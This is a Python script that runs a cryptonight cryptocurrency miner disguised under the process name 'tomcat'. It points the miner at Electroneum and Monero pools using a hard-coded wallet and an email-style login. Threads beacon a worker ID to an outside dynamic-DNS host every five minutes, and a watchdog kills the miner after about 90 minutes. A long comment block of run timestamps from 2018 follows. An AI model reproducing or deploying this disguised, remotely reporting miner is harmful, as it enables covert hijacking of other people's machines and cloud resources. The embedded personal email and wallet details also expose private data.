import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:17:06.216495
#2018-02-17 16:05:05.782743
#2018-02-17 17:52:06.410774
#2018-02-17 19:41:01.284727
#2018-02-17 21:29:02.152997
#2018-02-17 23:13:01.373699
#2018-02-18 00:59:07.432019
#2018-02-18 02:47:03.569062
#2018-02-18 04:34:07.511175
#2018-02-18 06:25:06.973521
#2018-02-18 08:14:05.820809
#2018-02-18 10:02:03.752111
#2018-02-18 11:49:03.534895
#2018-02-18 13:34:04.570281
#2018-02-18 15:24:04.663384
#2018-02-18 17:12:04.249236
#2018-02-18 19:00:08.564586
#2018-02-18 20:47:03.753389
#2018-02-18 22:40:04.184515
#2018-02-19 00:29:03.704485
#2018-02-19 02:14:02.047270
#2018-02-19 04:02:05.124486
#2018-02-19 05:46:07.574887
#2018-02-19 07:36:07.414786
#2018-02-19 09:25:03.956873
#2018-02-19 11:14:06.979827
#2018-02-19 13:03:08.962767
#2018-02-19 14:49:05.099942
#2018-02-19 16:38:08.805530
#2018-02-19 18:25:08.450292
#2018-02-19 20:12:01.509165
#2018-02-19 22:01:05.556306
#2018-02-19 23:47:04.806250
#2018-02-20 01:34:02.005873
#2018-02-20 03:22:02.044218
#2018-02-20 05:08:06.691643
#2018-02-20 06:51:01.550947
#2018-02-20 08:37:07.692976
#2018-02-20 10:21:09.433912
#2018-02-20 12:06:07.089184
#2018-02-20 13:54:06.648821
#2018-02-20 15:38:01.911879
#2018-02-20 17:22:03.907055
#2018-02-20 19:11:06.061263
#2018-02-20 21:00:03.592354
#2018-02-20 22:44:07.830005
#2018-02-21 00:26:03.823413
#2018-02-21 02:13:05.058869
#2018-02-21 03:59:01.612482
#2018-02-21 05:46:05.163579
#2018-02-21 07:33:07.361062
#2018-02-21 09:19:01.268038
#2018-02-21 11:07:09.432700
#2018-02-21 12:56:01.688031
#2018-02-21 14:43:12.696920
#2018-02-21 16:32:08.015417
#2018-02-21 18:22:05.405525
#2018-02-21 20:07:05.904336
#2018-02-21 21:55:07.012535
#2018-02-21 23:44:06.200889
#2018-02-22 01:33:07.960267
#2018-02-22 03:21:05.766604
#2018-02-22 05:08:05.880588
#2018-02-22 06:52:08.109168
#2018-02-22 08:40:05.417158
#2018-02-22 10:27:08.044201
#2018-02-22 12:12:12.117167
#2018-02-22 13:59:06.736056
#2018-02-22 15:47:09.208920
#2018-02-22 17:34:06.661272
#2018-02-22 19:22:07.754381
#2018-02-22 21:14:04.995729
#2018-02-22 22:59:01.379344
#2018-02-23 00:47:05.890919
#2018-02-23 02:36:08.183398
#2018-02-23 04:26:02.744663
#2018-02-23 06:12:01.311717
#2018-02-23 07:59:05.453549
#2018-02-23 10:17:07.549420
#2018-02-23 12:11:06.643229
#2018-02-23 13:58:02.143016
#2018-02-23 15:51:11.737440
#2018-02-23 17:38:02.170368
#2018-02-23 19:24:07.685370
#2018-02-23 21:07:05.107226
#2018-02-23 22:53:06.977479
#2018-02-24 00:43:05.527982
#2018-02-24 02:35:05.332844
#2018-02-24 04:31:04.308580
#2018-02-24 06:16:01.806852
#2018-02-24 08:04:04.750124
#2018-02-24 09:47:07.455268
#2018-02-24 11:43:06.240131
#2018-02-24 13:35:06.012563
#2018-02-24 15:23:07.012553
#2018-02-24 17:13:03.483679
#2018-02-24 19:05:08.652504
#2018-02-24 20:54:04.481827
#2018-02-24 23:19:06.638485
#2018-02-25 02:44:05.875761
#2018-02-25 06:33:01.356040